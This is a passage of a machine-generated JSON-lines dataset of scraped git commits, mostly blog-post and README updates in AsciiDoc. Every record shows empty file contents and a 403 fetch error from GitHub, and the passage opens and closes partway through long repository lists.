lasticsearch,SergVro\/elasticsearch,nrkkalyan\/elasticsearch,wbowling\/elasticsearch,iacdingping\/elasticsearch,weipinghe\/elasticsearch,ckclark\/elasticsearch,sneivandt\/elasticsearch,hanswang\/elasticsearch,lydonchandra\/elasticsearch,nellicus\/elasticsearch,maddin2016\/elasticsearch,jimhooker2002\/elasticsearch,vingupta3\/elasticsearch,vietlq\/elasticsearch,vroyer\/elasticassandra,masterweb121\/elasticsearch,mrorii\/elasticsearch,Clairebi\/ElasticsearchClone,naveenhooda2000\/elasticsearch,mrorii\/elasticsearch,hanst\/elasticsearch,rento19962\/elasticsearch,mute\/elasticsearch,phani546\/elasticsearch,aglne\/elasticsearch,trangvh\/elasticsearch,markllama\/elasticsearch,ob
ourgain\/elasticsearch,tebriel\/elasticsearch,nrkkalyan\/elasticsearch,Brijeshrpatel9\/elasticsearch,Shekharrajak\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra-test,coding0011\/elasticsearch,cnfire\/elasticsearch-1,yanjunh\/elasticsearch,masaruh\/elasticsearch,chirilo\/elasticsearch,rento19962\/elasticsearch,pritishppai\/elasticsearch,markllama\/elasticsearch,likaiwalkman\/elasticsearch,myelin\/elasticsearch,combinatorist\/elasticsearch,Chhunlong\/elasticsearch,cwurm\/elasticsearch,franklanganke\/elasticsearch,VukDukic\/elasticsearch,wuranbo\/elasticsearch,apepper\/elasticsearch,ckclark\/elasticsearch,btiernay\/elasticsearch,brandonkearby\/elasticsearch,rhoml\/elasticsearch,scottsom\/elasticsearch,diendt\/elasticsearch,i-am-Nathan\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mjhennig\/elasticsearch,YosuaMichael\/elasticsearch,kalburgimanjunath\/elasticsearch,kcompher\/elasticsearch,JackyMai\/elasticsearch,mrorii\/elasticsearch,kkirsche\/elasticsearch,zkidkid\/elasticsearch,zhiqinghuang\/elasticsearch,AshishThakur\/elasticsearch,himanshuag\/elasticsearch,overcome\/elasticsearch,Charlesdong\/elasticsearch,masaruh\/elasticsearch,yongminxia\/elasticsearch,AndreKR\/elasticsearch,rhoml\/elasticsearch,VukDukic\/elasticsearch,loconsolutions\/elasticsearch,huypx1292\/elasticsearch,likaiwalkman\/elasticsearch,areek\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,HarishAtGitHub\/elasticsearch,cwurm\/elasticsearch,cwurm\/elasticsearch,Asimov4\/elasticsearch,nazarewk\/elasticsearch,kaneshin\/elasticsearch,camilojd\/elasticsearch,yynil\/elasticsearch,nazarewk\/elasticsearch,lchennup\/elasticsearch,markllama\/elasticsearch,yongminxia\/elasticsearch,mm0\/elasticsearch,ouyangkongtong\/elasticsearch,C-Bish\/elasticsearch,beiske\/elasticsearch,hanst\/elasticsearch,strapdata\/elassandra-test,rajanm\/elasticsearch,jango2015\/elasticsearch,mapr\/elasticsearch,vietlq\/elasticsearch,HarishAtGitHub\/elasticsearch,coding0011\/elasticsearch,markllama\/elasticsearch,koxa29\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,hechunwen\/elasticsearch,yongminxia\/elasticsearch,ImpressTV\/elasticsearch,adrianbk\/elasticsearch,djschny\/elasticsearch,awislowski\/elasticsearch,himanshuag\/elasticsearch,alexkuk\/elasticsearch,polyfractal\/elasticsearch,yynil\/elasticsearch,kevinkluge\/elasticsearch,lks21c\/elasticsearch,andrejserafim\/elasticsearch,EasonYi\/elasticsearch,alexbrasetvik\/elasticsearch,jeteve\/elasticsearch,bestwpw\/elasticsearch,linglaiyao1314\/elasticsearch,lydonchandra\/elasticsearch,zkidkid\/elasticsearch,mjhennig\/elasticsearch,vroyer\/elassandra,robin13\/elasticsearch,Collaborne\/elasticsearch,avikurapati\/elasticsearch,golubev\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,szroland\/elasticsearch,onegambler\/elasticsearch,IanvsPoplicola\/elasticsearch,mnylen\/elasticsearch,YosuaMichael\/elasticsearch,smflorentino\/elasticsearch,tahaemin\/elasticsearch,andrestc\/elasticsearch,golubev\/elasticsearch,mmaracic\/elasticsearch,SergVro\/elasticsearch,karthikjaps\/elasticsearch,Siddartha07\/elasticsearch,Shepard1212\/elasticsearch,petabytedata\/elasticsearch,nellicus\/elasticsearch,smflorentino\/elasticsearch,sarwarbhuiyan\/elasticsearch,clintongormley\/elasticsearch,sc0ttkclark\/elasticsearch,Chhunlong\/elasticsearch,pablocastro\/elasticsearch,chirilo\/elasticsearch,petmit\/elasticsearch,thecocce\/elasticsearch,zhiqinghuang\/elasticsearch,andrestc\/elasticsearch,masaruh\/elasticsearch,andrestc\/elasticsearch,mm0\/elasticsea
rch,lzo\/elasticsearch-1,jimczi\/elasticsearch,vingupta3\/elasticsearch,pranavraman\/elasticsearch,gmarz\/elasticsearch,wittyameta\/elasticsearch,kimimj\/elasticsearch,elasticdog\/elasticsearch,ulkas\/elasticsearch,sauravmondallive\/elasticsearch,szroland\/elasticsearch,zeroctu\/elasticsearch,Siddartha07\/elasticsearch,rhoml\/elasticsearch,Collaborne\/elasticsearch,lchennup\/elasticsearch,AshishThakur\/elasticsearch,beiske\/elasticsearch,xingguang2013\/elasticsearch,phani546\/elasticsearch,EasonYi\/elasticsearch,njlawton\/elasticsearch,AndreKR\/elasticsearch,sc0ttkclark\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,easonC\/elasticsearch,Rygbee\/elasticsearch,koxa29\/elasticsearch,Fsero\/elasticsearch,yuy168\/elasticsearch,franklanganke\/elasticsearch,C-Bish\/elasticsearch,amaliujia\/elasticsearch,strapdata\/elassandra5-rc,vietlq\/elasticsearch,nknize\/elasticsearch,milodky\/elasticsearch,scottsom\/elasticsearch,MjAbuz\/elasticsearch,bestwpw\/elasticsearch,franklanganke\/elasticsearch,mrorii\/elasticsearch,tsohil\/elasticsearch,rmuir\/elasticsearch,huanzhong\/elasticsearch,zkidkid\/elasticsearch,bawse\/elasticsearch,avikurapati\/elasticsearch,mnylen\/elasticsearch,Ansh90\/elasticsearch,mkis-\/elasticsearch,sneivandt\/elasticsearch,kenshin233\/elasticsearch,alexshadow007\/elasticsearch,18098924759\/elasticsearch,dataduke\/elasticsearch,SergVro\/elasticsearch,Brijeshrpatel9\/elasticsearch,alexkuk\/elasticsearch,JSCooke\/elasticsearch,Helen-Zhao\/elasticsearch,apepper\/elasticsearch,yuy168\/elasticsearch,anti-social\/elasticsearch,sdauletau\/elasticsearch,kimimj\/elasticsearch,yuy168\/elasticsearch,JackyMai\/elasticsearch,gmarz\/elasticsearch,areek\/elasticsearch,Shepard1212\/elasticsearch,MaineC\/elasticsearch,dongjoon-hyun\/elasticsearch,janmejay\/elasticsearch,wuranbo\/elasticsearch,pranavraman\/elasticsearch,nomoa\/elasticsearch,mbrukman\/elasticsearch,mute\/elasticsearch,schonfeld\/elasticsearch,koxa29\/elasticsearch,AndreKR\/elasticsearch,Clairebi\/ElasticsearchClone,yongminxia\/elasticsearch,jbertouch\/elasticsearch,tebriel\/elasticsearch,btiernay\/elasticsearch,amit-shar\/elasticsearch,qwerty4030\/elasticsearch,awislowski\/elasticsearch,sauravmondallive\/elasticsearch,thecocce\/elasticsearch,easonC\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,ESamir\/elasticsearch,szroland\/elasticsearch,combinatorist\/elasticsearch,mcku\/elasticsearch,elasticdog\/elasticsearch,mnylen\/elasticsearch,Widen\/elasticsearch,mjason3\/elasticsearch,ivansun1010\/elasticsearch,martinstuga\/elasticsearch,clintongormley\/elasticsearch,jw0201\/elastic,apepper\/elasticsearch,mgalushka\/elasticsearch,heng4fun\/elasticsearch,JackyMai\/elasticsearch,sauravmondallive\/elasticsearch,18098924759\/elasticsearch,C-Bish\/elasticsearch,wayeast\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,hydro2k\/elasticsearch,Siddartha07\/elasticsearch,feiqitian\/elasticsearch,hydro2k\/elasticsearch,naveenhooda2000\/elasticsearch,lchennup\/elasticsearch,snikch\/elasticsearch,slavau\/elasticsearch,gingerwizard\/elasticsearch,TonyChai24\/ESSource,wbowling\/elasticsearch,weipinghe\/elasticsearch,davidvgalbraith\/elasticsearch,onegambler\/elasticsearch,elasticdog\/elasticsearch,Brijeshrpatel9\/elasticsearch,gingerwizard\/elasticsearch,beiske\/elasticsearch,glefloch\/elasticsearch,vingupta3\/elasticsearch,lchennup\/elasticsearch,nellicus\/elasticsearch,mohit\/elasticsearch,kingaj\/elasticsearch,vroyer\/elasticassandra,franklanganke\/elasticsearch,tahaemin\/ela
sticsearch,Stacey-Gammon\/elasticsearch,KimTaehee\/elasticsearch,gfyoung\/elasticsearch,nellicus\/elasticsearch,Asimov4\/elasticsearch,jsgao0\/elasticsearch,luiseduardohdbackup\/elasticsearch,codebunt\/elasticsearch,palecur\/elasticsearch,girirajsharma\/elasticsearch,sreeramjayan\/elasticsearch,beiske\/elasticsearch,yynil\/elasticsearch,coding0011\/elasticsearch,zhiqinghuang\/elasticsearch,iantruslove\/elasticsearch,khiraiwa\/elasticsearch,wangtuo\/elasticsearch,Uiho\/elasticsearch,ImpressTV\/elasticsearch,ulkas\/elasticsearch,sneivandt\/elasticsearch,mjhennig\/elasticsearch,Liziyao\/elasticsearch,geidies\/elasticsearch,hydro2k\/elasticsearch,janmejay\/elasticsearch,golubev\/elasticsearch,fernandozhu\/elasticsearch,weipinghe\/elasticsearch,iamjakob\/elasticsearch,dylan8902\/elasticsearch,queirozfcom\/elasticsearch,MjAbuz\/elasticsearch,lchennup\/elasticsearch,markwalkom\/elasticsearch,markllama\/elasticsearch,jimhooker2002\/elasticsearch,Rygbee\/elasticsearch,robin13\/elasticsearch,jchampion\/elasticsearch,avikurapati\/elasticsearch,Helen-Zhao\/elasticsearch,iamjakob\/elasticsearch,luiseduardohdbackup\/elasticsearch,sarwarbhuiyan\/elasticsearch,Collaborne\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,ImpressTV\/elasticsearch,JervyShi\/elasticsearch,awislowski\/elasticsearch,qwerty4030\/elasticsearch,xingguang2013\/elasticsearch,18098924759\/elasticsearch,iantruslove\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,StefanGor\/elasticsearch,rmuir\/elasticsearch,Helen-Zhao\/elasticsearch,kingaj\/elasticsearch,AndreKR\/elasticsearch,pranavraman\/elasticsearch,rhoml\/elasticsearch,acchen97\/elasticsearch,strapdata\/elassandra5-rc,wayeast\/elasticsearch,springning\/elasticsearch,mjhennig\/elasticsearch,dongjoon-hyun\/elasticsearch,thecocce\/elasticsearch,Liziyao\/elasticsearch,JervyShi\/elasticsearch,MisterAndersen\/elasticsearch,vrkansagara\/elasticsearch,ThalaivaStars\/OrgRepo1,jimhooker2002\/elasticsearch,yongminxia\/elasticsearch,zkidkid\/elasticsearch,dylan8902\/elasticsearch,spiegela\/elasticsearch,sscarduzio\/elasticsearch,Siddartha07\/elasticsearch,ivansun1010\/elasticsearch,pranavraman\/elasticsearch,hirdesh2008\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,tebriel\/elasticsearch,rmuir\/elasticsearch,awislowski\/elasticsearch,jchampion\/elasticsearch,golubev\/elasticsearch,cnfire\/elasticsearch-1,combinatorist\/elasticsearch,i-am-Nathan\/elasticsearch,sscarduzio\/elasticsearch,bestwpw\/elasticsearch,anti-social\/elasticsearch,YosuaMichael\/elasticsearch,Flipkart\/elasticsearch,nilabhsagar\/elasticsearch,lmtwga\/elasticsearch,sc0ttkclark\/elasticsearch,springning\/elasticsearch,djschny\/elasticsearch,sposam\/elasticsearch,snikch\/elasticsearch,mmaracic\/elasticsearch,wimvds\/elasticsearch,girirajsharma\/elasticsearch,markharwood\/elasticsearch,petabytedata\/elasticsearch,achow\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,pritishppai\/elasticsearch,xuzha\/elasticsearch,camilojd\/elasticsearch,himanshuag\/elasticsearch,masterweb121\/elasticsearch,Liziyao\/elasticsearch,Helen-Zhao\/elasticsearch,szroland\/elasticsearch,hanswang\/elasticsearch,xpandan\/elasticsearch,iamjakob\/elasticsearch,fernandozhu\/elasticsearch,hanst\/elasticsearch,fekaputra\/elasticsearch,ulkas\/elasticsearch,Chhunlong\/elasticsearch,hirdesh2008\/elasticsearch,winstonewert\/elasticsearch,Charlesdong\/elasticsearch,Uiho\/elasticsearch,smflorentino\/elasticsearch,shreejay\/elasticsearch,abibell\/elasticsearch,Fsero\/el
asticsearch,geidies\/elasticsearch,KimTaehee\/elasticsearch,Rygbee\/elasticsearch,queirozfcom\/elasticsearch,zeroctu\/elasticsearch,wayeast\/elasticsearch,iamjakob\/elasticsearch,s1monw\/elasticsearch,overcome\/elasticsearch,kunallimaye\/elasticsearch,ckclark\/elasticsearch,chirilo\/elasticsearch,petmit\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,mkis-\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,Charlesdong\/elasticsearch,ivansun1010\/elasticsearch,wayeast\/elasticsearch,andrestc\/elasticsearch,onegambler\/elasticsearch,TonyChai24\/ESSource,girirajsharma\/elasticsearch,Helen-Zhao\/elasticsearch,kaneshin\/elasticsearch,truemped\/elasticsearch,wbowling\/elasticsearch,Ansh90\/elasticsearch,alexshadow007\/elasticsearch,ThalaivaStars\/OrgRepo1,s1monw\/elasticsearch,Shepard1212\/elasticsearch,fernandozhu\/elasticsearch,Charlesdong\/elasticsearch,geidies\/elasticsearch,chrismwendt\/elasticsearch,linglaiyao1314\/elasticsearch,ThalaivaStars\/OrgRepo1,NBSW\/elasticsearch,hafkensite\/elasticsearch,caengcjd\/elasticsearch,codebunt\/elasticsearch,nrkkalyan\/elasticsearch,tahaemin\/elasticsearch,iacdingping\/elasticsearch,kaneshin\/elasticsearch,nellicus\/elasticsearch,18098924759\/elasticsearch,strapdata\/elassandra-test,markharwood\/elasticsearch,mm0\/elasticsearch,clintongormley\/elasticsearch,wuranbo\/elasticsearch,btiernay\/elasticsearch,alexkuk\/elasticsearch","old_file":"docs\/reference\/query-dsl\/filters\/range-filter.asciidoc","new_file":"docs\/reference\/query-dsl\/filters\/range-filter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a87fd6630990395ddb1aafd6276ac45a89df1c20","subject":"Create Readme.adoc","message":"Create Readme.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.19-3\/alpine\/Readme.adoc","new_file":"1.0.0-beta.19-3\/alpine\/Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4f01d3fa99687d1bc1b41c77ed6dd34dcb78380","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b36f0b83e1288f17bd0a79c61790371b7a1b2153","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1c4c892d167cabd8e1a9477a62ddfe73b1e12bdc","subject":"Update 2018-03-09-AWS-ECS.adoc","message":"Update 2018-03-09-AWS-ECS.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2018-03-09-AWS-ECS.adoc","new_file":"_posts\/2018-03-09-AWS-ECS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a99aa5fc5b491fa824b142ae84d924241137490","subject":"y2b create post Are You Ready For The Zombie Apocalypse?","message":"y2b create post Are You Ready For The Zombie Apocalypse?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-29-Are-You-Ready-For-The-Zombie-Apocalypse.adoc","new_file":"_posts\/2013-04-29-Are-You-Ready-For-The-Zombie-Apocalypse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe9e372cc87b46bb81b415b7376b4c5443ad9e3e","subject":"y2b create post iPhone 5s Fingerprint Scanner: Is it safe?","message":"y2b create post iPhone 5s Fingerprint Scanner: Is it safe?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-16-iPhone-5s-Fingerprint-Scanner-Is-it-safe.adoc","new_file":"_posts\/2013-09-16-iPhone-5s-Fingerprint-Scanner-Is-it-safe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db0f8131b1fe9b11157270d2e5843d4750434165","subject":"Update 2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","message":"Update 2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","new_file":"_posts\/2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cab4e1962f9316ad67094695d2c452894e4f613","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9636b33d862a8f7ef517bce252642e829cbd0343","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 
2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0809ae5a8565d60a63a2fa0a7933920b766abef","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6ec1e9e586659a99291f2c6ffa5e6e0986f9122","subject":"Publish 2016-11-10.adoc","message":"Publish 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"2016-11-10.adoc","new_file":"2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88966ae954e4e01f88a4cffcceb1765e345ec8fd","subject":"y2b create post The Best Sounding Smartphone","message":"y2b create post The Best Sounding Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-06-The-Best-Sounding-Smartphone.adoc","new_file":"_posts\/2015-08-06-The-Best-Sounding-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74f3db2325a98694102f366073bf94c6687bf146","subject":"Update 2017-07-15-Ansible-and-rolling-upgrades.adoc","message":"Update 2017-07-15-Ansible-and-rolling-upgrades.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-07-15-Ansible-and-rolling-upgrades.adoc","new_file":"_posts\/2017-07-15-Ansible-and-rolling-upgrades.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"047343c7bfd12abac8580faf5fa5f420acd7bdb1","subject":"Update 2015-09-19-JSON-syntax.adoc","message":"Update 2015-09-19-JSON-syntax.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1e85ff36adf32bb23118192a0dd77c202baa0a","subject":"Update 2017-01-25-Spring-Boot.adoc","message":"Update 2017-01-25-Spring-Boot.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-01-25-Spring-Boot.adoc","new_file":"_posts\/2017-01-25-Spring-Boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ba612ab725613bf264a7416492fcc9acb9cbab","subject":"Update 2019-01-26-true-source.adoc","message":"Update 2019-01-26-true-source.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-01-26-true-source.adoc","new_file":"_posts\/2019-01-26-true-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbd3930caf49fa19c06a974dad1cb7120085063f","subject":"Add README with general purpose and module overview","message":"Add README with general purpose and module overview\n","repos":"lordofthejars\/arquillian-universe-bom,arquillian\/arquillian-universe-bom,smiklosovic\/arquillian-universe-bom,lordofthejars\/arquillian-universe-bom","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lordofthejars\/arquillian-universe-bom.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d54a4a78290fca428f1fa619a4effba28e49e494","subject":"Trying to fix link.","message":"Trying to fix link.","repos":"haumacher\/jbake,kaulkie\/jbake,rajmahendra\/jbake,uli-heller\/jbake,haumacher\/jbake,mtolk\/jbake,xuyanxiang\/jbake,ancho\/jbake,haumacher\/jbake,jbake-org\/jbake,ineiros\/jbake,jonbullock\/jbake,danielgrycman\/jbake,leonac\/jbake,ineiros\/jbake,Vad1mo\/JBake,mohitkanwar\/jbake,haumacher\/jbake,uli-heller\/jbake,mohitkanwar\/jbake,rajmahendra\/jbake,HuguesH\/jbake,xuyanxiang\/jbake,kaulkie\/jbake,Vad1mo\/JBake,xuyanxiang\/jbake,ineiros\/jbake,danielgrycman\/jbake,kaulkie\/jbake,HuguesH\/jbake,mtolk\/jbake,mohitkanwar\/jbake,HuguesH\/jbake,uli-heller\/jbake,Vad1mo\/JBake,leonac\/jbake,jonbullock\/jbake,mtolk\/jbake,jbake-org\/jbake,rajmahendra\/jbake,ancho\/jbake,danielgrycman\/jbake,leonac\/jbake","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ineiros\/jbake.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e10390c323055ab3692229ce2a5d29031e7df13","subject":"Updated badges to reflect repo transfer.","message":"Updated badges to reflect repo 
transfer.","repos":"Vad1mo\/JBake,mtolk\/jbake,danielgrycman\/jbake,kaulkie\/jbake,jbake-org\/jbake,xuyanxiang\/jbake,Vad1mo\/JBake,mtolk\/jbake,uli-heller\/jbake,mohitkanwar\/jbake,HuguesH\/jbake,HuguesH\/jbake,danielgrycman\/jbake,mohitkanwar\/jbake,ancho\/jbake,mohitkanwar\/jbake,HuguesH\/jbake,xuyanxiang\/jbake,rajmahendra\/jbake,uli-heller\/jbake,haumacher\/jbake,ineiros\/jbake,kaulkie\/jbake,xuyanxiang\/jbake,mtolk\/jbake,jonbullock\/jbake,danielgrycman\/jbake,ineiros\/jbake,ineiros\/jbake,jonbullock\/jbake,leonac\/jbake,uli-heller\/jbake,rajmahendra\/jbake,leonac\/jbake,ancho\/jbake,leonac\/jbake,haumacher\/jbake,rajmahendra\/jbake,haumacher\/jbake,Vad1mo\/JBake,jbake-org\/jbake,kaulkie\/jbake,haumacher\/jbake","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuguesH\/jbake.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21652745304a21d9ec8dd6b5e0030baf77429a48","subject":"docs\/instcomp: manual for instcomp","message":"docs\/instcomp: manual for instcomp\n\nthis probably should go into the docs repo\n","repos":"kinsamanka\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,unseenlaser\/machinekit,bobvanderlinden\/machinekit,araisrobo\/machinekit,RunningLight\/machinekit,unseenlaser\/machinekit,Cid427\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,kinsamanka\/machinekit,bobvanderlinden\/machinekit,mhaberler\/machinekit,bobvanderlinden\/machinekit,RunningLight\/machinekit,RunningLight\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,ArcEye\/machinekit-testing,mhaberler\/machinekit,kinsamanka\/machinekit,RunningLight\/machinekit,bobvanderlinden\/machinekit,unseenlaser\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,kinsamanka\/machinekit,kinsamanka\/machinekit,ArcEye\/machinekit-testing,strahlex\/machinekit,ArcEye\/machinekit-testing,mhaberler\/machinekit,ArcEye\/MK-Qt5,bobvanderlinden\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,Cid427\/machinekit,Cid427\/machinekit,strahlex\/machinekit,Cid427\/machinekit,RunningLight\/machinekit,unseenlaser\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,Cid427\/machinekit,RunningLight\/machinekit,kinsamanka\/machinekit,kinsamanka\/machinekit,araisrobo\/machinekit,bobvanderlinden\/machinekit,RunningLight\/machinekit,araisrobo\/machinekit,ArcEye\/machinekit-testing,araisrobo\/machinekit,ArcEye\/machinekit-testing,ArcEye\/machinekit-testing,unseenlaser\/machinekit,unseenlaser\/machinekit,unseenlaser\/machinekit,Cid427\